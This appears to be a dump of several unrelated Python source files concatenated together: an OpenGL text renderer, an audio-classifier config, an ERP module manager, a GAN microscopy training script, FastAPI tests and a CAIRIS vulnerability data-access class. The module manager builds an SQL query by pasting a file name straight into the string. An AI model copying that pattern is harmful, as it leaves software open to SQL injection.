(Y/N): ")""" Class for rendering bitmaps and text in a window with OpenGL """ import os from typing import Any, Optional, Set, Tuple import numpy as np SCRIPT_DIR = os.path.dirname(os.path.abspath(__file__)) FONT: Optional[np.ndarray] = None def _str_to_array(s: str) -> np.ndarray: """ Convert a text string into a numpy array """ max_line_length = max(len(line) for line in s.split("\n")) lines = [] for line in s.split("\n"): lines.append(line + " " * (max_line_length - len(line))) arrs = [] for line in lines: arr = np.frombuffer(line.encode("utf8"), dtype=np.uint8) arrs.append(arr) return np.stack(arrs) def _convert_ascii_to_rgba(arr: np.ndarray, size_px=32) -> np.ndarray: """ Convert an ascii array to an image array using the loaded font """ global FONT if FONT is None: FONT = np.load(os.path.join(SCRIPT_DIR, "font.bin")) charset = FONT[f"{size_px}px"] _, char_height, char_width = charset.shape height, width = arr.shape image = np.ones((height * char_height, width * char_width, 4), dtype=np.uint8) * 255 for y in range(height): for x in range(width): ch = arr[y, x] image[ y * char_height : (y + 1) * char_height, x * char_width : (x + 1) * char_width, 3, ] = charset[ch] return image BITMAP_VERTEX_SHADER = """ #version 330 uniform float in_width; uniform float in_height; in vec2 in_pos; in vec2 in_tex_coord; out vec2 tex_coord; void main() { // convert from screen pixels to normalized device coordinates gl_Position = vec4(in_pos.x / (in_width / 2) - 1, in_pos.y / (in_height / 2) - 1, 0.0, 1.0); tex_coord = in_tex_coord; } """ BITMAP_FRAGMENT_SHADER = """ #version 330 in vec2 tex_coord; uniform float in_alpha; uniform sampler2D sampler; out vec4 out_frag_color; void main() { out_frag_color = texture(sampler, tex_coord); // set in_alpha to -1 to use the original alpha of the texture if (in_alpha != -1.0) { out_frag_color.a = in_alpha; } } """ class Renderer: """ A simple window for rendering that uses OpenGL to display bitmaps or text and returns key presses. Subclasses can override behavior to provide environment-specific drawing. 
""" def __init__(self, width: int, height: int) -> None: # do late imports of these to avoid any interference with other opengl libraries try: import glfw self._glfw = glfw except ImportError as e: raise Exception( f"failed to import glfw: '{e}', please make sure you have the newest version of glfw with `pip install --upgrade glfw`" ) import moderngl self._mgl = moderngl if not self._glfw.init(): raise Exception("failed to initialize glfw") self._glfw.window_hint(self._glfw.CLIENT_API, self._glfw.OPENGL_API) self._glfw.window_hint(self._glfw.CONTEXT_VERSION_MAJOR, 3) self._glfw.window_hint(self._glfw.CONTEXT_VERSION_MINOR, 3) self._glfw.window_hint( self._glfw.OPENGL_PROFILE, self._glfw.OPENGL_CORE_PROFILE ) self._glfw.window_hint(self._glfw.OPENGL_FORWARD_COMPAT, True) self._glfw.window_hint(self._glfw.RESIZABLE, False) self._glfw.window_hint(self._glfw.DOUBLEBUFFER, True) self._glfw.window_hint(self._glfw.DEPTH_BITS, 24) self.width = width self.height = height self.is_open = True self._should_close = False self._window = self._glfw.create_window( self.width, self.height, "Gym3 Viewer", None, None ) if not self._window: self._glfw.terminate() raise Exception("failed to create window") # self._glfw.get_key_name doesn't handle non-text keys self._key_to_name = { getattr(self._glfw, attr): attr.split("_", 1)[1] for attr in dir(self._glfw) if attr.startswith("KEY_") } self._keys_clicked = set() self._keys_pressed = set() self._glfw.set_key_callback(self._window, self._on_key_event) self._glfw.make_context_current(self._window) self._ctx = self._mgl.create_context() self._ctx.enable_only(self._mgl.BLEND) self._ctx.blend_func = self._mgl.SRC_ALPHA, self._mgl.ONE_MINUS_SRC_ALPHA self._bitmap_shader = self._ctx.program( vertex_shader=BITMAP_VERTEX_SHADER, fragment_shader=BITMAP_FRAGMENT_SHADER ) self._bitmap_shader["in_width"].value = self.width self._bitmap_shader["in_height"].value = self.height self._vbo = None self._vao = None def _on_key_event( self, window: Any, key: int, scancode: int, action: int, mode: int ) -> None: name = self._key_to_name.get(key) if action == self._glfw.PRESS: self._keys_pressed.add(name) self._keys_clicked.add(name) elif action == self._glfw.RELEASE: if name in self._keys_pressed: # hitting "fn" on a mac only seems to produce the RELEASE action self._keys_pressed.remove(name) def get_time(self) -> float: """ Get an accurate time using glfw.get_time() """ return self._glfw.get_time() def start(self) -> Tuple[Set, Set]: """ Start a new frame Returns: keys_clicked: keys the user has pressed since the last time finish() was called keys_pressed: keys the user currently has held down """ self._glfw.poll_events() self._ctx.screen.clear(0.0, 0.0, 0.0, 1.0) self._should_close = "ESCAPE" in self._keys_clicked keys_clicked = self._keys_clicked self._keys_clicked = set() return keys_clicked, self._keys_pressed def draw_bitmap( self, x: float, y: float, w: float, h: float, image: np.ndarray, antialias: bool = False, alpha: float = 1.0, ) -> None: """ Draw a bitmap to the screen at the location (x, y) with size (w, h) all units are in screen pixels Args: x: x position relative to left side of screen in pixels y: y position relative to bottom side of screen in pixels w: width of image in pixels h: height of image in pixels image: a numpy array of the image to draw antialias: if set to True, use antialiasing then drawing the bitmap alpha: how opaque to make the bitmap, 1.0 is fully opaque, 0.0 is transparent, -1.0 means use the alpha channel of the image """ tex = 
self._ctx.texture( size=(image.shape[1], image.shape[0]), components=image.shape[2], data=image.tobytes(), ) if not antialias: tex.filter = (self._mgl.NEAREST, self._mgl.NEAREST) tex.use(location=self._bitmap_shader["sampler"].value) self._bitmap_shader["in_alpha"].value = alpha # textures are expected to start with the last row of the image (the lower left corner) # but numpy format starts with the first row (top left corner) # as a result, we need to flip the t values in our texture coordinates vertices = np.array( [ # x, y, s, t [x, y, 0, 1], [x + w, y, 1, 1], [x, y + h, 0, 0], [x + w, y + h, 1, 0], ], dtype=np.float32, ) if self._vbo is None: self._vbo = self._ctx.buffer(vertices.tobytes()) else: self._vbo.write(vertices.tobytes()) if self._vao is None: self._vao = self._ctx.simple_vertex_array( self._bitmap_shader, self._vbo, "in_pos", "in_tex_coord" ) self._glfw.make_context_current(self._window) self._vao.render(self._mgl.TRIANGLE_STRIP) tex.release() def draw_text( self, x: float, y: float, text: str, size_px: int = 32, centered: bool = False, bg_alpha: float = 0.0, ) -> None: """ Draw a multi-line text string `text` to the screen at the indicated location (x, y) Args: x: x position relative to left side of screen in pixels y: y position relative to bottom side of screen in pixels text: text to draw, multiple lines are fine size_px: what size font to use in pixels centered: if set to True, x and y specify the center of the resulting text box rather than the bottom left corner bg_alpha: opacity of black background that is drawn automatically behind the text """ arr = _str_to_array(text) image = _convert_ascii_to_rgba(arr, size_px=size_px) w = image.shape[1] h = image.shape[0] if centered: x -= w / 2 y -= h / 2 self.draw_bitmap( x, y, w, h, image=np.zeros((1, 1, 3), dtype=np.uint8), alpha=bg_alpha ) self.draw_bitmap(x=x, y=y, w=w, h=h, image=image, alpha=-1.0) def finish(self) -> None: """ Complete the current frame and return keyboard keys that the user has input """ self._glfw.swap_buffers(self._window) if self._should_close or self._glfw.window_should_close(self._window): self._glfw.destroy_window(self._window) self.is_open = False def main(): r = Renderer(width=768, height=768) for i in range(1000): r.start() r.draw_text(i, r.height // 2, "meow!") r.finish() if __name__ == "__main__": main() 1-10 """ Convolutional Network Audio Classiifier default config. 
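A minimal sketch of how a run might read these settings (only keys that appear
in the ``experiments`` dict below are assumed):

    dataset_cfg = experiments[experiments["dataset_name"]]
    iterator_cfg = experiments["data_iterator"]
    model_cfg = experiments["model"]
    print(model_cfg["name"], model_cfg["learning_rate"], iterator_cfg["batch_size"])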
""" import copy import tensorflow as tf experiments = { "num_epochs": 15, "model_directory": "models/naive_lstm/", "dataset_name": "freesound_dataset", "data_iterator_name": "lstm_features", "model_name": "naive_lstm", "learning_rate": 0.0001, "freesound_dataset": { "labels_index_map_store_path": "/tmp/shabda/", "n_classes": 41, "train_csv_path": "data/freesound-audio-tagging/input/train.csv", "val_csv_path": None, # we dont have any validation csv file as such "test_csv_path": "./data/freesound-audio-tagging/input/sample_submission.csv", "train_audio_files_dir": "./data/freesound-audio-tagging/input/audio_train/", "val_audio_files_dir": "./data/freesound-audio-tagging/input/audio_train/", "test_audio_files_dir": "./data/freesound-audio-tagging/input/audio_test/" }, "data_iterator": { "use_mfcc": False, "n_mfcc": 64, "batch_size": 32, "sampling_rate": 44100, "audio_duration": 2, }, "cnn_naive": { "out_dim": 41 + 1, # one unknown "name": "cnn_naive", "learning_rate": 0.001 }, "model": { "out_dim": 41 + 1, # one unknown "name": "lstm_naive", "learning_rate": 0.001 } } Farhad-Shabani/TSETMC_Dashboard from .Essential_Functions import URL_Maker, Negative_Detector from .Scrape_Index import Scrape_Index from .Scrape_StockInfo import StockInfo from .Scrape_StockData_Realtime import Realtime_StockData from pineboolib.flcontrols import ProjectClass from pineboolib import decorators, qt3ui """ Gestor de módulos. Esta clase permite realizar las funciones básicas de manejo de ficheros de texto que forman parte de los módulos de aplicación, utilizando como soporte de almacenamiento la base de datos y el sistema de cachés de texto para optimizar las lecturas. Gestiona la carga y descarga de módulos. Mantiene cual es el módulo activo. El módulo activo se puede establecer en cualquier momento con FLManagerModules::setActiveIdModule(). Los módulos se engloban en áreas (FACTURACION, FINANCIERA, PRODUCCION, etc..) y cada módulo tiene varios ficheros de texto XML y scripts. Toda la estructura de módulos se almacena en las tablas flareas, flmodulos, flserial y flfiles, sirviendo esta clase como interfaz para el manejo de dicha estructura en el entorno de trabajo de AbanQ. @author InfoSiAL S.L. """ class FLManagerModules(ProjectClass): """ Mantiene el identificador del area a la que pertenece el módulo activo. """ activeIdArea_ = None """ Mantiene el identificador del módulo activo. """ activeIdModule_ = None """ Mantiene la clave sha correspondiente a la version de los módulos cargados localmente """ shaLocal_ = None """ Diccionario de claves de ficheros, para optimizar lecturas """ dictKeyFiles = {} """ Lista de todos los identificadores de módulos cargados, para optimizar lecturas """ listAllIdModules_ = {} """ Lista de todas los identificadores de areas cargadas, para optimizar lecturas """ listIdAreas_ = {} """ Diccionario con información de los módulos """ dictInfoMods = {} """ Diccionario de identificadores de modulo de ficheros, para optimizar lecturas """ dictModFiles = {} """ Base de datos a utilizar por el manejador """ db_ = None """ Uso interno. Informacion para la carga estatica desde el disco local """ staticBdInfo_ = None rootDir_ = None scriptsDir_ = None tablesDir_ = None formsDir_ = None reportsDir_ = None queriesDir_ = None transDir_ = None """ constructor """ def __init__(self, db = None): super(FLManagerModules ,self).__init__() if db: self.db_ = db """ destructor """ def __del__(self): self.finish() """ Acciones de inicialización del sistema de módulos. 
""" @decorators.NotImplementedWarn def init(self): pass """ Acciones de finalización del sistema de módulos. """ @decorators.NotImplementedWarn def finish(self): pass """ Obtiene el contenido de un fichero almacenado la base de datos. Este método busca el contenido del fichero solicitado en la base de datos, exactamente en la tabla flfiles, si no lo encuentra intenta obtenerlo del sistema de ficheros. @param n Nombre del fichero. @return QString con el contenido del fichero o vacía en caso de error. """ @decorators.NotImplementedWarn def content(self, n): return None """ Obtiene el contenido de un fichero de script, procesándolo para cambiar las conexiones que contenga, de forma que al acabar la ejecución de la función conectada se reanude el guión de pruebas. Tambien realiza procesos de formateo del código para optimizarlo. @param n Nombre del fichero. @return QString con el contenido del fichero o vacía en caso de error. """ @decorators.NotImplementedWarn def byteCodeToStr(self, n): return None @decorators.NotImplementedWarn def contentCode(self, n): return None """ Obtiene el contenido de un fichero almacenado en el sistema de ficheros. @param pN Ruta y nombre del fichero en el sistema de ficheros @return QString con el contenido del fichero o vacía en caso de error. """ @decorators.NotImplementedWarn def contentFS(self, pN): return None """ Obtiene el contenido de un fichero, utilizando la caché de memoria y disco. Este método primero busca el contenido del fichero solicitado en la caché interna, si no está lo obtiene con el método FLManagerModules::content(). @param n Nombre del fichero. @return QString con el contenido del fichero o vacía en caso de error. """ @decorators.NotImplementedWarn def contentCached(self, n, shaKey = None): return None """ Almacena el contenido de un fichero en un módulo dado. @param n Nombre del fichero. @param idM Identificador del módulo al que se asociará el fichero @param content Contenido del fichero. """ @decorators.NotImplementedWarn def setContent(self, n, idM, content): pass """ Crea un formulario a partir de su fichero de descripción. Utiliza el método FLManagerModules::contentCached() para obtener el texto XML que describe el formulario. @param n Nombre del fichero que contiene la descricpción del formulario. @return QWidget correspondiente al formulario construido. """ def createUI(self, n, connector = None, parent = None, name = None): if not ".ui" in n: n = n +".ui" form_path = parent.prj.path(n) qt3ui.loadUi(form_path, parent.widget) """ Crea el formulario maestro de una acción a partir de su fichero de descripción. Utiliza el método FLManagerModules::createUI() para obtener el formulario construido. @param a Objeto FLAction. @return QWidget correspondiente al formulario construido. """ @decorators.NotImplementedWarn def createForm(self, a, connector = None, parent = None, name = None): return None """ Esta función es igual a la anterior, sólo se diferencia en que carga la descripción de interfaz del formulario de edición de registros. """ @decorators.NotImplementedWarn def createFormRecord( self, a, connector = None, parent = None, name = None): return None """ Para establecer el módulo activo. Automáticamente también establece cual es el área correspondiente al módulo, ya que un módulo sólo puede pertenecer a una sola área. @param id Identificador del módulo """ @decorators.NotImplementedWarn def setActiveIdModule(self, _id): pass """ Para obtener el area del módulo activo. 
@return Identificador del area """ def activeIdArea(self): return self.activeIdArea_ """ Para obtener el módulo activo. @return Identificador del módulo """ def activeIdModule(self): return self.activeIdModule_ """ Obtiene la lista de identificadores de area cargadas en el sistema. @return Lista de identificadores de areas """ @decorators.NotImplementedWarn def listIdAreas(self): return None """ Obtiene la lista de identificadores de módulos cargados en el sistema de una area dada. @param idA Identificador del área de la que se quiere obtener la lista módulos @return Lista de identificadores de módulos """ @decorators.NotImplementedWarn def listIdModules(self, idA): return None """ Obtiene la lista de identificadores de todos los módulos cargados en el sistema. @return Lista de identificadores de módulos """ @decorators.NotImplementedWarn def listAllIdModules(self): pass """ Obtiene la descripción de un área a partir de su identificador. @param idA Identificador del área. @return Texto de descripción del área, si lo encuentra o idA si no lo encuentra. """ @decorators.NotImplementedWarn def idAreaToDescription(self, idA): return None """ Obtiene la descripción de un módulo a partir de su identificador. @param idM Identificador del módulo. @return Texto de descripción del módulo, si lo encuentra o idM si no lo encuentra. """ @decorators.NotImplementedWarn def idModuleToDescription(self, idM): return None """ Para obtener el icono asociado a un módulo. @param idM Identificador del módulo del que obtener el icono @return QPixmap con el icono """ @decorators.NotImplementedWarn def iconModule(self, idM): return None """ Para obtener la versión de un módulo. @param idM Identificador del módulo del que se quiere saber su versión @return Cadena con la versión """ @decorators.NotImplementedWarn def versionModule(self, idM): return None """ Para obtener la clave sha local. @return Clave sha de la versión de los módulos cargados localmente """ @decorators.NotImplementedWarn def shaLocal(self): return None """ Para obtener la clave sha global. @return Clave sha de la versión de los módulos cargados globalmente """ @decorators.NotImplementedWarn def shaGlobal(self): return None """ Establece el valor de la clave sha local con el del global. """ @decorators.NotImplementedWarn def setShaLocalFromGlobal(self): pass """ Obtiene la clave sha asociada a un fichero almacenado. @param n Nombre del fichero @return Clave sh asociada al ficheros """ @decorators.NotImplementedWarn def shaOfFile(self, n): return None """ Carga en el diccionario de claves las claves sha1 de los ficheros """ @decorators.NotImplementedWarn def loadKeyFiles(self): pass """ Carga la lista de todos los identificadores de módulos """ @decorators.NotImplementedWarn def loadAllIdModules(self): pass """ Carga la lista de todos los identificadores de areas """ @decorators.NotImplementedWarn def loadIdAreas(self): pass """ Comprueba las firmas para un modulo dado """ @decorators.NotImplementedWarn def checkSignatures(self): pass """ Para obtener el identificador del módulo al que pertenece un fichero dado. 
@param n Nombre del fichero incluida la extensión @return Identificador del módulo al que pertenece el fichero """ def idModuleOfFile(self, n): query = "SELECT idmodulo FROM flfiles WHERE nombre='%s'" % n cursor = self.db_.cursor() try: cursor.execute(query) except: return None for idmodulo in cursor: return idmodulo[0] """ Guarda el estado del sistema de módulos """ @decorators.NotImplementedWarn def writeState(self): pass """ Lee el estado del sistema de módulos """ def readState(self): pass """ Uso interno. Obtiene el contenido de un fichero mediante la carga estatica desde el disco local @param n Nombre del fichero. @return QString con el contenido del fichero o vacía en caso de error. """ @decorators.NotImplementedWarn def contentStatic(self, n): return None """ Uso interno. Muestra cuadro de dialogo para configurar la carga estatica desde el disco local """ @decorators.NotImplementedWarn def staticLoaderSetup(self): pass 1-10 import os, argparse, sys, shutil, warnings, glob from datetime import datetime import matplotlib.pyplot as plt from math import log2, log10 import pandas as pd import numpy as np from collections import OrderedDict from torchvision import transforms, utils import torchvision import torch.nn.functional as F import torch.nn as nn import torch.optim as optim import torch from torch.utils.data import DataLoader from torch.autograd import Variable import torch.optim.lr_scheduler as lr_scheduler from skimage import exposure, color, io, img_as_float, img_as_ubyte from skimage.util import view_as_windows, pad, montage from PIL import Image, ImageFilter import imagej import data_loader as data import models import pytorch_fid.fid_score as fid_score def paired_dataloader(args, csv='train'): transformed_dataset = data.Paired_Dataset(csv_file=data.paired_csv_path(csv, dataset=args.dataset), img_size=args.patch_size, transform=data.Compose([data.ToTensor()]) ) dataloader = DataLoader(transformed_dataset, batch_size=args.batch_size, shuffle=True, num_workers=args.num_workers) return dataloader def train(args, epoch, run, dataloader, generator, discriminator, optimizer_G, optimizer_D, criterionL, criterionMSE, Tensor=None, device='cuda:0', patch=None): l = args.percep_weight if args.gan == 0: gan = False else: gan = True epoch_loss = 0 gan_loss = 0 total_loss = 0 dis_loss = 0 generator.train() for iteration, batch in enumerate(dataloader): real_mid = Variable(batch['input'].type(Tensor).to(device), requires_grad=False) real_high = Variable(batch['output'].type(Tensor).to(device), requires_grad=False) # Adversarial ground truths valid = Variable(Tensor(np.ones((real_mid.size(0), *patch))).to(device), requires_grad=False) fake = Variable(Tensor(np.zeros((real_mid.size(0), *patch))).to(device), requires_grad=False) #--------------- # Train Generator #--------------- optimizer_G.zero_grad() # GAN loss fake_high = generator(real_mid) if gan: pred_fake = discriminator(fake_high, real_mid) loss_GAN = criterionMSE(pred_fake, valid) # Identity lossL1 = criterionL(fake_high, real_high) loss_pixel = lossL1 # Total loss if gan: loss_G = l * loss_GAN + (1-l) * loss_pixel loss_G.backward() total_loss = total_loss + loss_G.item() gan_loss = gan_loss + loss_GAN.item() else: loss_pixel.backward() optimizer_G.step() #--------------- # Train Discriminator #--------------- if gan and iteration % args.num_critic == 0: optimizer_D.zero_grad() # Real loss pred_real = discriminator(real_high, real_mid) loss_real = criterionMSE(pred_real, valid) # Fake loss pred_fake = 
discriminator(fake_high.detach(), real_mid) loss_fake = criterionMSE(pred_fake, fake) # Total loss loss_D = 0.5 * (loss_real + loss_fake) loss_D.backward() optimizer_D.step() dis_loss = dis_loss + loss_D.item() epoch_loss = epoch_loss + loss_pixel.item() if gan: sys.stdout.write('\r[%d/%d][%d/%d] Discriminator_Loss: %.4f Generator_Loss (Identity/Advers/Total): %.4f/%.4f/%.4f' % (epoch, args.num_epochs, iteration, len(dataloader), loss_D.item(), loss_pixel.item(), loss_GAN.item(), loss_G.item())) else: sys.stdout.write('\r[%d/%d][%d/%d] Generator_L1_Loss: %.4f' % (epoch, args.num_epochs, iteration, len(dataloader), loss_pixel.item())) print("\n ===> Epoch {} Complete: Avg. Loss: {:.4f}".format(epoch, epoch_loss / len(dataloader))) g_path = os.path.join('weights', run, 'generator.pth') d_path = os.path.join('weights', run, 'discriminator.pth') os.makedirs(os.path.join('weights', run), exist_ok=True) torch.save(generator.state_dict(), g_path) if gan: os.makedirs(os.path.join('weights', run), exist_ok=True) torch.save(discriminator.state_dict(), d_path) def compute_p_snr(path_input, path_ref): MSE = nn.MSELoss() imgs_input = glob.glob(os.path.join(path_input, '*.tiff')) imgs_ref = glob.glob(os.path.join(path_ref, '*.tiff')) ave_psnr = 0 for i in range(len(imgs_input)): img_input = torch.from_numpy(img_as_float(io.imread(imgs_input[i]).transpose(2, 1, 0))) img_ref = torch.from_numpy(img_as_float(io.imread(imgs_ref[i]).transpose(2, 1, 0))) img_input = img_input[None, :] img_ref = img_ref[None, :] mse = MSE(img_input, img_ref) psnr = 10 * log10(1 / mse.item()) ave_psnr += psnr ave_psnr = ave_psnr / len(imgs_input) return ave_psnr def print_output(generator, dataloader_valid, device='cuda:0'): os.makedirs('output/print', exist_ok=True) os.makedirs('output/print/lr', exist_ok=True) os.makedirs('output/print/hr', exist_ok=True) os.makedirs('output/print/sr', exist_ok=True) with torch.no_grad(): generator.eval() print("=> Printing sampled patches") for k, batch in enumerate(dataloader_valid): input, target = batch['input'].to(device), batch['output'].to(device) imgs_input =input.float().to(device) prediction = generator(imgs_input) target = target.float() for i in range(target.shape[0]): utils.save_image(imgs_input[i], 'output/print/lr/{}_{}.tiff'.format(k, i)) utils.save_image(target[i], 'output/print/hr/{}_{}.tiff'.format(k, i)) utils.save_image(prediction[i], 'output/print/sr/{}_{}.tiff'.format(k, i)) sys.stdout.write("\r ==> Batch {}/{}".format(k+1, len(dataloader_valid))) print("\n Computing FID score") fid = fid_score.calculate_fid_given_paths(('output/print/sr', 'output/print/hr'), 8, 'cuda:0', 2048) print("\n Computing PSNR") psnr = compute_p_snr('output/print/sr', 'output/print/hr') print("FID score: {}, PSNR: {}".format(fid, psnr)) return fid, psnr def main(): parser = argparse.ArgumentParser(description='Train WSISR on compressed TMA dataset') parser.add_argument('--batch-size', default=32, type=int, help='Batch size') parser.add_argument('--patch-size', default=256, type=int, help='Patch size') parser.add_argument('--num-workers', default=4, type=int, help='Number of workers') parser.add_argument('--num-epochs', default=900, type=int, help='Number of epochs, more epochs are desired for GAN training') parser.add_argument('--g-lr', default=0.0001, type=float, help='Learning rate of the generator') parser.add_argument('--d-lr', default=0.00001, type=float, help='Learning rate of the descriminator') parser.add_argument('--percep-weight', default=0.01, type=float, help='GAN loss weight') 
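# Minimal sketch, illustrative only: compute_p_snr above evaluates PSNR as
# 10*log10(1/MSE), which assumes images scaled to [0, 1]; the general relation
# is PSNR = 10*log10(MAX^2 / MSE). The helper name below is hypothetical.
import numpy as np

def psnr_from_arrays(img_a, img_b, data_range=1.0):
    """Peak signal-to-noise ratio between two equally shaped float arrays."""
    mse = np.mean((np.asarray(img_a, dtype=np.float64) - np.asarray(img_b, dtype=np.float64)) ** 2)
    if mse == 0:
        return float('inf')  # identical inputs
    return 10.0 * np.log10((data_range ** 2) / mse)
# Example: psnr_from_arrays(np.zeros((8, 8)), np.full((8, 8), 0.1)) gives 20.0 dB.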
parser.add_argument('--run-from', default=None, type=str, help='Load weights from a previous run, use folder name in [weights] folder') parser.add_argument('--gan', default=1, type=int, help='Use GAN') parser.add_argument('--num-critic', default=1, type=int, help='Iteration interval for training the descriminator') parser.add_argument('--test-interval', default=50, type=int, help='Epoch interval for FID score testing') parser.add_argument('--print-interval', default=10, type=int, help='Epoch interval for output printing') parser.add_argument('--dataset', default='TMA', type=str, help='Dataset folder name') parser.add_argument('--in-folder', default='low', type=str, help='Low NA image folder name') parser.add_argument('--out-folder', default='high', type=str, help='High NA image folder name') parser.add_argument('--extension', default='jpg', type=str, help='Training image extension') args = parser.parse_args() warnings.filterwarnings('ignore') device = torch.device('cuda:0') tensor = torch.cuda.FloatTensor data.generate_paired_csv(dataset=args.dataset, in_folder=args.in_folder, out_folder=args.out_folder, ext=args.extension) valid_dataset = paired_dataloader(args, 'valid') train_dataset = paired_dataloader(args, 'train') test_dataset = paired_dataloader(args, 'test') generator = models.Generator() generator.to(device); discriminator = models.Discriminator() discriminator.to(device); criterionL = nn.L1Loss().cuda() criterionMSE = nn.MSELoss().cuda() optimizer_G = torch.optim.Adam(generator.parameters(), lr=args.g_lr) optimizer_D = torch.optim.Adam(discriminator.parameters(), lr=args.d_lr) patch = (1, args.patch_size // 2 ** 4, args.patch_size // 2 ** 4) if args.run_from is not None: generator.load_state_dict(torch.load(os.path.join('weights', args.run_from, 'generator.pth'))) try: discriminator.load_state_dict(torch.load(os.path.join('weights', args.run_from, 'discriminator.pth'))) except: print('Discriminator weights not found!') pass optimizer_G = torch.optim.Adam(generator.parameters(), lr=args.g_lr) optimizer_D = torch.optim.Adam(discriminator.parameters(), lr=args.d_lr) scheduler_G = torch.optim.lr_scheduler.CosineAnnealingLR(optimizer_G, args.num_epochs, args.g_lr*0.05) scheduler_D = torch.optim.lr_scheduler.CosineAnnealingLR(optimizer_D, args.num_epochs, args.d_lr*0.05) run = datetime.now().strftime("%Y-%m-%d--%H-%M-%S") for epoch in range(0, args.num_epochs): train(args, epoch, run, train_dataset, generator, discriminator, optimizer_G, optimizer_D, criterionL, criterionMSE, tensor, device, patch) scheduler_G.step() scheduler_D.step() if epoch % args.print_interval == 0: print_output(generator, valid_dataset, device) print_output(generator, test_dataset, device) if __name__ == '__main__': main() from fastapi.testclient import TestClient from src.routes.car import app from src import DBConnection client = TestClient(app) def test_car_get_all(): response = client.get("/") assert response.status_code == 200 def test_car_add_new(): db = DBConnection() db.cursor.execute('DELETE from vehicle WHERE model = "TestModelOnly"') db.conn.commit() car = {"manufacturer": "BMW", "model": "TestModelOnly", "year": 2100, "price": 1242} response = client.post("/", json=car) assert response.status_code == 201 db.cursor.execute( 'SELECT manufacturer_id, model, year, price FROM vehicle WHERE model="TestModelOnly"' ) for i in db.cursor.fetchall(): assert i == { "manufacturer_id": 5, "model": "TestModelOnly", "year": 2100, "price": 1242, } db.cursor.execute('DELETE from vehicle WHERE model = "TestModelOnly"') 
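# Minimal sketch, illustrative only: the WSISR main() above pairs each Adam
# optimizer with CosineAnnealingLR(optimizer, T_max=num_epochs,
# eta_min=base_lr*0.05), so the learning rate follows a cosine from base_lr
# down to 5% of base_lr over the run. Dummy parameter and names are assumptions.
import torch

_param = torch.nn.Parameter(torch.zeros(1))
_opt = torch.optim.Adam([_param], lr=1e-4)
_sched = torch.optim.lr_scheduler.CosineAnnealingLR(_opt, T_max=10, eta_min=1e-4 * 0.05)
for _ in range(10):
    _opt.step()    # optimizer step first, then scheduler step
    _sched.step()  # the current LR decays from 1e-4 toward 5e-6 over T_max steps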
db.conn.commit() # Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The ASF licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. from cairis.core.ARM import * from cairis.daemon.CairisHTTPError import ARMHTTPError, ObjectNotFoundHTTPError, MalformedJSONHTTPError, MissingParameterHTTPError, \ OverwriteNotAllowedHTTPError from cairis.core.ValueType import ValueType from cairis.core.ValueTypeParameters import ValueTypeParameters from cairis.core.Vulnerability import Vulnerability from cairis.core.VulnerabilityEnvironmentProperties import VulnerabilityEnvironmentProperties from cairis.core.VulnerabilityParameters import VulnerabilityParameters from cairis.data.CairisDAO import CairisDAO from cairis.tools.JsonConverter import json_serialize, json_deserialize from cairis.tools.ModelDefinitions import VulnerabilityModel, VulnerabilityEnvironmentPropertiesModel from cairis.tools.SessionValidator import check_required_keys __author__ = ', ' class VulnerabilityDAO(CairisDAO): def __init__(self, session_id): CairisDAO.__init__(self, session_id, 'vulnerability') def get_objects(self, constraint_id=-1): try: vulnerabilities = self.db_proxy.getVulnerabilities(constraint_id) except DatabaseProxyException as ex: self.close() raise ARMHTTPError(ex) vulKeys = sorted(vulnerabilities.keys()) vulList = [] for key in vulKeys: vulList.append(self.simplify(vulnerabilities[key])) return vulList def get_object_by_name(self, name, simplify=True): found_vulnerability = None try: vulnerabilities = self.db_proxy.getVulnerabilities() except DatabaseProxyException as ex: self.close() raise ARMHTTPError(ex) if vulnerabilities is not None: found_vulnerability = vulnerabilities.get(name) if found_vulnerability is None: self.close() raise ObjectNotFoundHTTPError('The provided vulnerability name') if simplify: found_vulnerability = self.simplify(found_vulnerability) return found_vulnerability def add_object(self, vulnerability): vuln_params = VulnerabilityParameters( vulName=vulnerability.theName, vulDesc=vulnerability.theDescription, vulType=vulnerability.theType, tags=vulnerability.theTags, cProperties=vulnerability.theEnvironmentProperties ) try: if not self.check_existing_vulnerability(vulnerability.theName): new_id = self.db_proxy.addVulnerability(vuln_params) return new_id else: self.close() raise OverwriteNotAllowedHTTPError(obj_name=vulnerability.theName) except DatabaseProxyException as ex: self.close() raise ARMHTTPError(ex) except ARMException as ex: self.close() raise ARMHTTPError(ex) def update_object(self, vulnerability, name): vuln_params = VulnerabilityParameters( vulName=vulnerability.theName, vulDesc=vulnerability.theDescription, vulType=vulnerability.theType, tags=vulnerability.theTags, cProperties=vulnerability.theEnvironmentProperties ) try: vulId = self.db_proxy.getDimensionId(name,'vulnerability') vuln_params.setId(vulId) 
self.db_proxy.updateVulnerability(vuln_params) except DatabaseProxyException as ex: self.close() raise ARMHTTPError(ex) except ARMException as ex: self.close() raise ARMHTTPError(ex) def delete_object(self, name): try: vulId = self.db_proxy.getDimensionId(name,'vulnerability') self.db_proxy.deleteVulnerability(vulId) except DatabaseProxyException as ex: self.close() raise ARMHTTPError(ex) except ARMException as ex: self.close() raise ARMHTTPError(ex) def check_existing_vulnerability(self, name): try: self.db_proxy.nameCheck(name, 'vulnerability') return False except ARMException as ex: if str(ex.value).find('already exists') > -1: return True self.close() raise ARMHTTPError(ex) def from_json(self, request): json = request.get_json(silent=True) if json is False or json is None: self.close() raise MalformedJSONHTTPError(data=request.get_data()) json_dict = json['object'] check_required_keys(json_dict, VulnerabilityModel.required) json_dict['__python_obj__'] = Vulnerability.__module__+'.'+Vulnerability.__name__ for idx in range(0, len(json_dict['theEnvironmentProperties'])): property = json_dict['theEnvironmentProperties'][idx] check_required_keys(property, VulnerabilityEnvironmentPropertiesModel.required) property['__python_obj__'] = VulnerabilityEnvironmentProperties.__module__+'.'+VulnerabilityEnvironmentProperties.__name__ json_dict['theEnvironmentProperties'][idx] = property vulnerability = json_serialize(json_dict) vulnerability = json_deserialize(vulnerability) if not isinstance(vulnerability, Vulnerability): self.close() raise MalformedJSONHTTPError(data=request.get_data()) else: return vulnerability def simplify(self, obj): assert isinstance(obj, Vulnerability) del obj.theVulnerabilityId del obj.theEnvironmentDictionary del obj.severityLookup return obj exchangemanager/settings/production.py import dj_database_url from .base 